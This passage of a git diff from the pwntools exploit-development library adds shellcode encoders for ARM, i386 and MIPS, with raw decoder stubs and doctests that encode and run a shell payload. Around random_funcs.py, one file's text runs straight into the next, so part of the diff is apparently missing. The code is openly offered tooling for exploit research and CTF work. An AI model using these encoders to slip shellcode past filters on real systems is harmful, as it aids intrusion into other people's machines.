r4*/ + dec_loop += ARM_Instructions.dpshiftreg(SUB, 0, s, s, 5, LSR, 4) + + #RSBPLS rq, rq, #0x3I*/ + dec_loop += ARM_Instructions.dpimm(RSB, PL, 1, q, q, 0x30 | self.I) + + #BMI 0xfffff4*/ + dec_loop += ARM_Instructions.bmi() + + #STRPLB r4, [rt, #-(offset+1)]*/ + dec_loop += ARM_Instructions.lsbyte(STR, PL, 4, t, offset + 1) + + if icache_flush == 1: + #SWIPL 0x9f0002*/ + dec_loop += ARM_Instructions.swi(PL) + return dec_loop + + def encDecoderLoopBuilder(self, input): + output = '' + if len(input) == 0: + return output + for p in input: + if not alphanum_byte.alphanumeric_check(p): + output += chr(alphanum_byte.alphanumeric_get_byte()) + else: + output += p + return output + + def DecoderBuilder(self, input, icache_flush): + if len(input) == 0: + return '' + output = '' + + #Register selections*/ + arr = [4,6] + self.addr = random_funcs.randel(arr) + arr2 = [3, 5, 7] + self.i = random_funcs.randel(arr2) + arr3 = [0, 0] + q = 0 + for p in range(3): + if arr2[p] != self.i: + arr3[q] = arr2[p] + q += 1 + self.j = random_funcs.randel(arr3) + for p in range(2): + if arr3[p] != self.j: + self.k = arr3[p] + break + + self.x = alphanum_byte.off_gen(0x01) + offset = 0x91 + if icache_flush != 0: + output += self.algo1(input, 0, 3) + output += self.gap_traverse(0x1e) + output += self.algo1(input, 33, 5) + else: + output += self.gap_traverse(0x19) + output += self.algo1(input, 25, 5) + output += self.gap_traverse(0x0f) + if icache_flush != 0: + output += self.algo1(input, 53, 15) + else: + output += self.algo1(input, 45, 11) + #trucate the last instruction, which increments raddr by 1, from the output*/ + output = output[:-4] + self.size -= 4 + #Setting r0, r1, r2 for parameter passing*/ + #SUBPLS ri, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 1, self.i, self.i, self.x) + #SUBPL r4, ri, ri LSR ri*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 4, self.i, self.i, LSR, self.i) + #SUBPL r6, ri, ri LSR ri*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 6, self.i, self.i, LSR, self.i) + #SUBPL r5, rj, r4 ROR r6*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, 5, self.j, 4, ROR, 6) + + self.size += 4 * 4 + + if icache_flush: + arr4 = [3,7] + m = random_funcs.randel(arr4) + + c = alphanum_byte.off_gen(24) + arr5 = [2,4,6,8,10,12,14,16,18] + arr6 = [4,6] + arr7 = [1,2,4,8] + reglH = 0x40 | random_funcs.randel(arr7) + #SUBPL rm, sp, #(c+24) */ + output += ARM_Instructions.dpimm(SUB, PL, 0, m, 13, c + 24) + + #Store 4 0x00*/ + #STRPLB random_funcs.randel(arr6), [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + + #Store 4 0xff*/ + #STRPLB r5, [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(5, m, 5, random_funcs.randel(arr5)) + + #Store 4 0x00*/ + #STRPLB random_funcs.randel(arr6), [!rm, -(r5 ROR #random_funcs.randel(arr5))]*/ + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + output += ARM_Instructions.sbyteposti(random_funcs.randel(arr6), m, 5, random_funcs.randel(arr5)) + + #SUBPL rm, sp, #c*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, m, 13, c) + + #LDMPLDB rm!, {r0, r1, r2, r6, r8/9/10/11, r14}*/ + output += ARM_Instructions.lmul(m, reglH, 0x47) + + #SUBPLS rm, r5, r4 ROR rm*/ + output += ARM_Instructions.dpshiftreg(SUB, 1, m, 5, 4, ROR, m) + + self.size += 4 * 16 + return output + + def algo1(self, input, begin_inp, iter): + if len(input) == 0: + return '' + output = '' + offset = 0x91 + for p in range(begin_inp, begin_inp + iter): + y = ord(input[p]) + if alphanum_byte.alphanumeric_check(y): + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + self.size += 4 + continue + if y >= 0x80: + if alphanum_byte.alphanumeric_check(~y): + #EORPLS rk, rj, #~y*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, ~y) + #STRMIB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, MI, self.k, self.addr, offset) + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 4 + continue + + a = alphanum_byte.alphanumeric_get_complement(~y) + b = (a ^ ~y) & 0xff + #EORPLS rk, rj, #a*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, a) + #EORMIS rk, rk, #b*/ + output += ARM_Instructions.dpimm(EOR, MI, 1, self.k, self.k, b) + #STRMIB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, MI, self.k, self.addr, offset) + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 5 + continue + if self.x > y: + z1 = self.x - y + if alphanum_byte.alphanumeric_check(z1): + #SUBPL rk, ri, #z*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.k, self.i, z1) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + z2 = self.x + y + if alphanum_byte.alphanumeric_check(z2): + #RSBPL rk, ri, #z*/ + output += ARM_Instructions.dpimm(RSB, PL, 0, self.k, self.i, z2) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + z3 = self.x ^ y + if alphanum_byte.alphanumeric_check(z3): + #EORPLS rk, ri, #z*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.i, z3) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 3 + continue + a2 = alphanum_byte.alphanumeric_get_complement(z3) + b2 = a2 ^ z3 + #EORPLS rk, ri, #a*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.i, a2) + #EORPLS rk, rk, #b*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.k, b2) + #STRPLB rk, [raddr, #(-offset)]*/ + output += ARM_Instructions.lsbyte(STR, PL, self.k, self.addr, offset) + #SUBPL raddr, raddr, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.j, ROR, self.k) + + self.size += 4 * 4 + + + return output + + def gap_traverse(self, gap): + output = '' + g = alphanum_byte.off_gen(gap) + h = g + gap + #SUBPL rj, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x) + #EORPLS rk, rj, #g*/ + output += ARM_Instructions.dpimm(EOR, PL, 1, self.k, self.j, g) + #SUBPL rk, rk, #h*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.k, self.k, h) + #SUBPL raddr, raddr, rk LSR rj*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, self.addr, self.k, LSR, self.j) + #SUBPL rj, ri, #(x+1)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x + 1) + + self.size += 4 * 5 + return output + + + def buildInit(self, input): + if len(input) == 0: + return ('', input) + output = '' + + #Select values of v and w*/ + total = 0x70 + arr1 = [0x30, 0x34, 0x38] + v1 = random_funcs.randel(arr1) + v2 = random_funcs.randel(arr1) + + topv = ((total - (v1 + v2))/4) + 1 + + w1 = random_funcs.randel(arr1) + w2 = random_funcs.randel(arr1) + + topw = ((total - (w1 + w2))/4) + 2 + + arrop = [EOR, SUB, RSB] + arrcond = [PL, MI] + arrs = [0, 1] + arrd = [3, 5, 7] + arrn = [1, 2, 3, 4, 5, 6, 7, 8, 9] + p = 1 + while p <= ((total-8)/4): + op = random_funcs.randel(arrop) + cond = random_funcs.randel(arrcond) + if op == EOR: + s = 1 + else: + s = random_funcs.randel(arrs) + d = random_funcs.randel(arrd) + n = random_funcs.randel(arrn) + if p == topv or p == topw: + output += ARM_Instructions.dpimm(op, cond, s, d, n, self.x) + else: + output += ARM_Instructions.dpimm(op, cond, s, d, n, alphanum_byte.alphanumeric_get_byte()) + p += 1 + + #SUBPL ri, pc, #v1*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.i, 15, v1) + #SUBMI ri, pc, #w1*/ + output += ARM_Instructions.dpimm(SUB, MI, 0, self.i, 15, w1) + #LDRPLB ri, [ri, #(-v2)]*/ + output += ARM_Instructions.lsbyte(LDR, PL, self.i, self.i, v2) + #LDRMIB ri, [ri, #(-w2)]*/ + output += ARM_Instructions.lsbyte(LDR, MI, self.i, self.i, w2) + + output += self.algo2() + + #SUBPL rj, ri, #(x+1)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x + 1) + #Initializer built!!*/ + + #Replace 0x91s in decoder with addr_offset*/ + input_new = '' + for p in input: + if p == "\x91": + input_new += chr(self.addr_offset) + else: + input_new += p + return (output, input_new) + + def algo2(self): + output = '' + self.size += 4 + #SUBMIS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, MI, 1, self.k, self.i, self.x) + #SUBPLS rk, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 1, self.k, self.i, self.x) + #SUBPL rj, ri, #x*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.i, self.x) + + quo = (self.size - 4) / 0x7a + if quo >= 1: + for p in range(quo): + #SUBPL rj, rj, #0x7a*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, 0x7a) + + rem = (self.size - 4) % 0x7a + if rem >= 1 and rem <= 0x4a: + self.addr_offset = alphanum_byte.off_gen(rem) + #SUBPL rj, rj, #(offset+rem)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset + rem) + + if rem >= 0x4b and rem < 0x7a: + if alphanum_byte.alphanumeric_check(rem): + self.addr_offset = alphanum_byte.alphanumeric_get_byte() + #SUBPL rj, rj, #(rem)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, rem) + #SUBPL rj, rj, #(offset)*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset) + else: + self.addr_offset = alphanum_byte.off_gen(rem - 0x5a) + #SUBPL rj, rj, #0x5a*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, 0x5a) + #SUBPL rj, rj, #(offset + (rem - 0x5a))*/ + output += ARM_Instructions.dpimm(SUB, PL, 0, self.j, self.j, self.addr_offset + rem - 0x5a) + + #SUBPL raddr, pc, rj ROR rk*/ + output += ARM_Instructions.dpshiftreg(SUB, 0, self.addr, 15, self.j, ROR, self.k) + return output diff --git a/pwnlib/encoders/arm/alphanumeric/random_funcs.py b/pwnlib/encoders/arm/alphanumeric/random_funcs.py new file mode 100755 index 000000000..384d85bc1 --- /dev/null +++ b/pwnlib/encoders/arm/alphanumeric/random_funcs.py @@ -0,0 +1,36 @@ +import os +import struct +import random + +# +------------------------------------------------------------------------+ +# | RANDOM NUMBERS FUNCTIONS | +# +------------------------------------------------------------------------+ + +# get a random integer i (0<=i>> context.clear(arch='arm') + >>> shellcode = asm(shellcraft.sh()) + >>> avoid = 'binsh\x00\n' + >>> encoded = pwnlib.encoders.arm.xor.encode(shellcode, avoid) + >>> assert not any(c in encoded for c in avoid) + >>> p = run_shellcode(encoded) + >>> p.sendline('echo hello; exit') + >>> p.recvline() + 'hello\n' + """ + + arch = 'arm' + + decoder = """ + adr r8, payload + mov r4, #%(length)s + adr r6, xor_cacheflush +loop: + cmp r4, #%(maximum)s + bxhi r6 + sub r4, r4, #%(length)s + ldrb r5, [r8, r4] + eor r5, r5, #%(key)s + strb r5, [r8, r4] + add r4, r4, #%(length)s + 1 + b loop + +xor_cacheflush: + %(cacheflush)s +payload: + """ + + blacklist = set("\x01\x80\x03\x85\x04\x07\x87\x0c\x8f\x0f\x16\x1c\x9f\x84\xa0%$'-/\xb0\xbd\x81A@\xc2DG\xc6\xc8OPT\xd8_\xe1`\xe3\xe2\xe5\xe7\xe9\xe8\xea\xe0p\xf7") + + def __call__(self, raw_bytes, avoid, pcreg=''): + key, xordata = xor_key(raw_bytes, avoid, size=1) + key = u8(key) + maximum = 256 + length = len(raw_bytes) + cacheflush = shellcraft.arm.linux.cacheflush() + decoder = asm(self.decoder % locals()) + return decoder + xordata + +encode = ArmXorEncoder() diff --git a/pwnlib/encoders/i386/__init__.py b/pwnlib/encoders/i386/__init__.py index 631ae05ec..d4778bac6 100644 --- a/pwnlib/encoders/i386/__init__.py +++ b/pwnlib/encoders/i386/__init__.py @@ -1 +1,2 @@ +from . import delta from . import xor diff --git a/pwnlib/encoders/i386/delta.py b/pwnlib/encoders/i386/delta.py new file mode 100644 index 000000000..dc492f531 --- /dev/null +++ b/pwnlib/encoders/i386/delta.py @@ -0,0 +1,79 @@ +import collections +from random import randint, choice +from ...asm import asm +from ...asm import disasm +from ...context import context +from ...util.fiddling import hexdump +from ..encoder import Encoder + +''' +base: + fnop + cld + fnstenv [esp - 0xc] + pop esi + /* add esi, data - base */ + .byte 0x83, 0xc6, data - base + mov edi, esi +next: + lodsb + xchg eax, ebx + lodsb + sub al, bl + stosb + sub bl, 0xac + jnz next + +data: +''' + +class i386DeltaEncoder(Encoder): + r""" + i386 encoder built on delta-encoding. + + In addition to the loader stub, doubles the size of the shellcode. + + Example: + + >>> sc = pwnlib.encoders.i386.delta.encode('\xcc', '\x00\xcc') + >>> e = ELF.from_bytes(sc) + >>> e.process().poll(True) + -5 + """ + + arch = 'i386' + stub = None + terminator = 0xac + raw = '\xd9\xd0\xfc\xd9t$\xf4^\x83\xc6\x18\x89\xf7\xac\x93\xac(\xd8\xaa\x80\xeb\xacu\xf5' + + blacklist = set(raw) + + def __call__(self, bytes, avoid, pcreg=''): + table = collections.defaultdict(lambda: []) + endchar = '' + + not_bad = lambda x: chr(x) not in avoid + not_bad_or_term = lambda x: not_bad(x) and x != self.terminator + + for i in filter(not_bad_or_term, range(0, 256)): + endchar += chr(i) + for j in filter(not_bad, range(0, 256)): + table[(j - i) & 0xff].append(chr(i) + chr(j)) + + res = self.raw + + for c in bytes: + a = ord(c) + l = len(table[a]) + if l == 0: + print 'No encodings for character %02x' % a + return None + + res += table[a][randint(0, l - 1)] + + res += chr(self.terminator) + res += choice(endchar) + + return res + +encode = i386DeltaEncoder() diff --git a/pwnlib/encoders/mips/__init__.py b/pwnlib/encoders/mips/__init__.py new file mode 100644 index 000000000..631ae05ec --- /dev/null +++ b/pwnlib/encoders/mips/__init__.py @@ -0,0 +1 @@ +from . import xor diff --git a/pwnlib/encoders/mips/xor.py b/pwnlib/encoders/mips/xor.py new file mode 100644 index 000000000..94edbf8d9 --- /dev/null +++ b/pwnlib/encoders/mips/xor.py @@ -0,0 +1,135 @@ +#!/usr/bin/env python2 +# Source: +# https://github.com/zcutlip/bowcaster/blob/master/src/bowcaster/encoders/mips.py +# +# Copyright (c) 2013 Zachary Cutlip , +# 2013 Tactical Network Solutions, LLC +# +# +# Permission is hereby granted, free of charge, to any person obtaining a copy of +# this software and associated documentation files (the "Software"), to deal in +# the Software without restriction, including without limitation the rights to +# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +# of the Software, and to permit persons to whom the Software is furnished to do +# so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ...asm import asm +from ... import shellcraft +from ...context import context +from ...util.fiddling import xor_key +from ..encoder import Encoder + +decoders = { + 'little': ''.join([ + "SIZ2SIZ1\x0e\x24", # li t6,-5 + "\x27\x70\xc0\x01", # nor t6,t6,zero + "\xa3\xff\x0b\x24", # li t3,-93 + "\x26\x40\xce\x01", # xor t0,t6,t6 + "\xff\xff\x08\x21", # addi t0,t0,-1 + "\xff\xff\x10\x05", # bltzal t0,14 + "\x82\x82\x08\x28", # slti t0,zero,-32126 + "\xe2\xff\xfd\x23", # addi sp,ra,-30 + "\x27\x58\x60\x01", # nor t3,t3,zero + "\x21\xc8\xeb\x03", # addu t9,ra,t3 + "\x82\x82\x17\x28", # slti s7,zero,-32126 + "\xfc\xff\x31\x8f", # lw s1,-4(t9) + "\xfb\xff\x0c\x24", # li t4,-5 + "\x27\x60\x80\x01", # nor t4,t4,zero + "\xfd\xff\x8f\x21", # addi t7,t4,-3 + "\xfc\xff\x28\x8f", # lw t0,-4(t9) + "\x21\xb8\xef\x02", # addu s7,s7,t7 + "\x26\x18\x11\x01", # xor v1,t0,s1 + "\x2b\xf0\xee\x02", # sltu s8,s7,t6 + "\xfc\xff\x23\xaf", # sw v1,-4(t9) + "\xfa\xff\x1e\x14", # bne zero,s8,3c + "\x21\xc8\x2c\x03", # addu t9,t9,t4 + "\xfd\xff\x86\x21", # addi a2,t4,-3 + "\xf8\xff\xa6\xaf", # sw a2,-8(sp) + "\x26\x28\xce\x01", # xor a1,t6,t6 + "\xfc\xff\xa5\xaf", # sw a1,-4(sp) + "\xf8\xff\xa4\x27", # addiu a0,sp,-8 + "\x46\x10\x02\x24", # li v0,4166 + "\x0c\x54\x4a\x01" # syscall 0x52950 + ]), + 'big': ''.join([ + "\x24\x0eSIZ1SIZ2", # li t6,-5 + "\x01\xc0\x70\x27", # nor t6,t6,zero + "\x24\x0b\xff\xa3", # li t3,-93 + "\x01\xce\x40\x26", # xor t0,t6,t6 + "\x21\x08\xff\xff", # addi t0,t0,-1 + "\x05\x10\xff\xff", # bltzal t0,14 + "\x28\x08\x82\x82", # slti t0,zero,-32126 + "\x23\xfd\xff\xe2", # addi sp,ra,-30 + "\x01\x60\x58\x27", # nor t3,t3,zero + "\x03\xeb\xc8\x21", # addu t9,ra,t3 + "\x28\x17\x82\x82", # slti s7,zero,-32126 + "\x8f\x31\xff\xfc", # lw s1,-4(t9) + "\x24\x0c\xff\xfb", # li t4,-5 + "\x01\x80\x60\x27", # nor t4,t4,zero + "\x21\x8f\xff\xfd", # addi t7,t4,-3 + "\x8f\x28\xff\xfc", # lw t0,-4(t9) + "\x02\xef\xb8\x21", # addu s7,s7,t7 + "\x01\x11\x18\x26", # xor v1,t0,s1 + "\x02\xee\xf0\x2b", # sltu s8,s7,t6 + "\xaf\x23\xff\xfc", # sw v1,-4(t9) + "\x14\x1e\xff\xfa", # bne zero,s8,3c + "\x03\x2c\xc8\x21", # addu t9,t9,t4 + "\x21\x86\xff\xfd", # addi a2,t4,-3 + "\xaf\xa6\xff\xf8", # sw a2,-8(sp) + "\x01\xce\x28\x26", # xor a1,t6,t6 + "\xaf\xa5\xff\xfc", # sw a1,-4(sp) + "\x27\xa4\xff\xf8", # addiu a0,sp,-8 + "\x24\x02\x10\x46", # li v0,4166 + "\x01\x4a\x54\x0c" # syscall 0x52950 + ]) +} + + + +class MipsXorEncoder(Encoder): + r"""Generates an XOR decoder for MIPS. + + >>> context.clear(arch='mips') + >>> shellcode = asm(shellcraft.sh()) + >>> avoid = '/bin/sh\x00' + >>> encoded = pwnlib.encoders.mips.xor.encode(shellcode, avoid) + >>> assert not any(c in encoded for c in avoid) + >>> p = run_shellcode(encoded) + >>> p.sendline('echo hello; exit') + >>> p.recvline() + 'hello\n' + """ + + blacklist = cannot_avoid = set(''.join(v for v in decoders.values())) + + def __call__(self, raw_bytes, avoid, pcreg=''): + + assert 0 == len(raw_bytes) % context.bytes, "Payload is not aligned" + + size = (len(raw_bytes)/4) + 1 + assert size < 0x10000, "Payload is too long" + + size = size ^ 0xffff + sizelo = size & 0xff + sizehi = size >> 8 + + decoder = str(decoders[context.endian]) + decoder = decoder.replace('SIZ1', chr(sizehi)) + decoder = decoder.replace('SIZ2', chr(sizelo)) + + key, data = xor_key(raw_bytes, avoid=avoid) + + return decoder + key + data + +encode = MipsXorEncoder() diff --git a/pwnlib/gdb.py b/pwnlib/gdb.py index 3ec4d8a7f..3d7de24e9 100644 --- a/pwnlib/gdb.py +++ b/pwnlib/gdb.py @@ -7,7 +7,7 @@ from . import atexit from . import elf from . import tubes -from .asm import make_elf, _bfdname +from .asm import make_elf, make_elf_from_assembly, _bfdname from .context import context, LocalContext from .log import getLogger from .util import misc @@ -17,7 +17,21 @@ log = getLogger(__name__) @LocalContext -def debug_shellcode(data, execute=None): +def debug_assembly(asm, execute=None, vma=None): + """ + Creates an ELF file, and launches it with GDB. + + This is identical to debug_shellcode, except that + any defined symbols are available in GDB, and it + saves you the explicit call to asm(). + """ + tmp_elf = make_elf_from_assembly(asm, vma=vma, extract=False) + os.chmod(tmp_elf, 0777) + atexit.register(lambda: os.unlink(tmp_elf)) + return debug(tmp_elf, execute=None, arch=context.arch) + +@LocalContext +def debug_shellcode(data, execute=None, vma=None): """ Creates an ELF file, and launches it with GDB. @@ -28,11 +42,9 @@ def debug_shellcode(data, execute=None): Returns: A ``process`` tube connected to the shellcode on stdin/stdout/stderr. """ - tmp_elf = tempfile.mktemp(prefix='pwn', suffix='.elf') - elf_data = make_elf(data) - with open(tmp_elf,'wb+') as f: - f.write(elf_data) - f.flush() + if isinstance(data, unicode): + log.error("Shellcode is cannot be unicode. Did you mean debug_assembly?") + tmp_elf = make_elf(data, extract=False, vma=vma) os.chmod(tmp_elf, 0777) atexit.register(lambda: os.unlink(tmp_elf)) return debug(tmp_elf, execute=None, arch=context.arch) diff --git a/pwnlib/lexer.py b/pwnlib/lexer.py index 57c52f9de..0fd2961e0 100644 --- a/pwnlib/lexer.py +++ b/pwnlib/lexer.py @@ -81,7 +81,8 @@ class PwntoolsLexer(RegexLexer): 'whitespace': [ (r'\n', Text), (r'\s+', Text), - (r'/\*.*?\*/', Comment) + (r'/\*.*?\*/', Comment), + (r';.*$', Comment) ], 'punctuation': [ (r'[-*,.():]+', Punctuation) diff --git a/pwnlib/regsort.py b/pwnlib/regsort.py index 7b37e5e91..af4e21da9 100644 --- a/pwnlib/regsort.py +++ b/pwnlib/regsort.py @@ -2,8 +2,10 @@ """ Topographical sort """ +from random import shuffle, randint from collections import OrderedDict, defaultdict +from .context import context from .log import getLogger log = getLogger(__name__) @@ -103,7 +105,7 @@ def depends_on_cycle(reg, assignments, in_cycles): reg = assignments.get(reg, None) return False -def regsort(in_out, all_regs, tmp = None, xchg = True): +def regsort(in_out, all_regs, tmp = None, xchg = True, randomize = None): """ Sorts register dependencies. @@ -150,6 +152,8 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): Indicates the existence of an instruction which can swap the contents of two registers without use of a third register. If ``bool(xchg)==False``, this mode is disabled. + random(bool): + Randomize as much as possible about the order or registers. Returns: @@ -219,6 +223,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): ('mov', 'c', 'x'), ('mov', 'x', '1')] """ + if randomize is None: + randomize = context.randomize + sentinel = object() # Drop all registers which will be set to themselves. @@ -252,6 +259,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): if not any(v in in_out for k,v in in_out.items()): result = [('mov', k,in_out[k]) for k in sorted(in_out)] + if randomize: + shuffle(result) + for dreg, sreg in sorted(post_mov.items()): result.append(('mov', dreg, sreg)) @@ -265,9 +275,6 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): # In this case, both A and C must be set before B. deps = {r: extract_dependencies(r, in_out) for r in in_out} - # Order alphabetically for repeatability - not_done = OrderedDict(in_out) - # Final result which will be returned result = [] @@ -280,11 +287,19 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): in_cycle = [] not_in_cycle = [] + if randomize: + shuffle(cycle_candidates) + while cycle_candidates: reg = cycle_candidates[0] cycle = check_cycle(reg, in_out) if cycle: + if randomize: + x = randint(0, len(cycle)) + cycle = cycle[x:] + cycle[:x] + + cycles.append(cycle) in_cycle.extend(cycle) for reg in cycle: @@ -331,6 +346,9 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): not_in_cycle.remove(tmp) # Resolve everything *not* in a cycle. + if randomize: + shuffle(not_in_cycle) + while not_in_cycle: reg = not_in_cycle[0] order = resolve_order(reg, deps) @@ -363,8 +381,12 @@ def regsort(in_out, all_regs, tmp = None, xchg = True): # # ╭─ (A) → (B) → (C) ─╮ # ╰──────── ← ────────╯ + if randomize: + shuffle(cycles) + if tmp: for cycle in cycles: + first = cycle[0] last = cycle[-1] diff --git a/pwnlib/rop/srop.py b/pwnlib/rop/srop.py index 6540472ae..5eebb5dde 100644 --- a/pwnlib/rop/srop.py +++ b/pwnlib/rop/srop.py @@ -110,14 +110,14 @@ >>> context.clear() >>> context.arch = "mips" >>> context.endian = "big" - >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) + >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024) >>> assembly += 'sigreturn:' + shellcraft.sigreturn() >>> assembly += 'syscall: ' + shellcraft.syscall() - >>> assembly += 'exit: ' + 'xor $a0, $a0, $a0; li $v0, 0xfa1; syscall;' + >>> assembly += 'exit: ' + shellcraft.exit(0) >>> assembly += 'message: ' + ('.asciz "%s"' % message) >>> binary = ELF.from_assembly(assembly) >>> frame = SigreturnFrame() - >>> frame.v0 = 0xfa4 + >>> frame.v0 = constants.SYS_write >>> frame.a0 = constants.STDOUT_FILENO >>> frame.a1 = binary.symbols['message'] >>> frame.a2 = len(message) @@ -136,14 +136,14 @@ >>> context.clear() >>> context.arch = "mips" >>> context.endian = "little" - >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) + >>> assembly = 'read:' + shellcraft.read(constants.STDIN_FILENO, '$sp', 1024) >>> assembly += 'sigreturn:' + shellcraft.sigreturn() >>> assembly += 'syscall: ' + shellcraft.syscall() - >>> assembly += 'exit: ' + 'xor $a0, $a0, $a0; li $v0, 0xfa1; syscall;' + >>> assembly += 'exit: ' + shellcraft.exit(0) >>> assembly += 'message: ' + ('.asciz "%s"' % message) >>> binary = ELF.from_assembly(assembly) >>> frame = SigreturnFrame() - >>> frame.v0 = 0xfa4 + >>> frame.v0 = constants.SYS_write >>> frame.a0 = constants.STDOUT_FILENO >>> frame.a1 = binary.symbols['message'] >>> frame.a2 = len(message) diff --git a/pwnlib/shellcraft/__init__.py b/pwnlib/shellcraft/__init__.py index 560e3f313..58e8161fc 100644 --- a/pwnlib/shellcraft/__init__.py +++ b/pwnlib/shellcraft/__init__.py @@ -5,6 +5,7 @@ from . import internal from .. import constants +from ..util import packing from ..context import context @@ -32,6 +33,10 @@ def __init__(self, name, directory): # Insert into the module list sys.modules[self.__name__] = self + def _get_source(self, template): + assert template in self.templates + return os.path.join(self._absdir, *template.split('.')) + '.asm' + def __lazyinit__(self): # Create a dictionary of submodules @@ -122,6 +127,24 @@ def eval(self, item): return item return constants.eval(item) + def pretty(self, n, comment=True): + if isinstance(n, str): + return repr(n) + if not isinstance(n, int): + return n + if isinstance(n, constants.Constant): + if comment: return '%s /* %s */' % (n,self.pretty(int(n))) + else: return '%s (%s)' % (n,self.pretty(int(n))) + elif abs(n) < 10: + return str(n) + else: + return hex(n) + + def okay(self, s, *a, **kw): + if isinstance(s, int): + s = packing.pack(s, *a, **kw) + return '\0' not in s and '\n' not in s + import registers # To prevent garbage collection diff --git a/pwnlib/shellcraft/internal.py b/pwnlib/shellcraft/internal.py index 9d80d9ecb..841cf1a86 100644 --- 